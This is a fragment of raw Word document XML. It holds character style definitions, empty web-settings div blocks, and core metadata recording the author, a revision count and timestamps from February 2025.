    <w:qFormat/>
    <w:rsid w:val="00CB06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0613"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CB06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306654">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="565455741">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1183058720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="119446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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-04T16:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-04T17:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>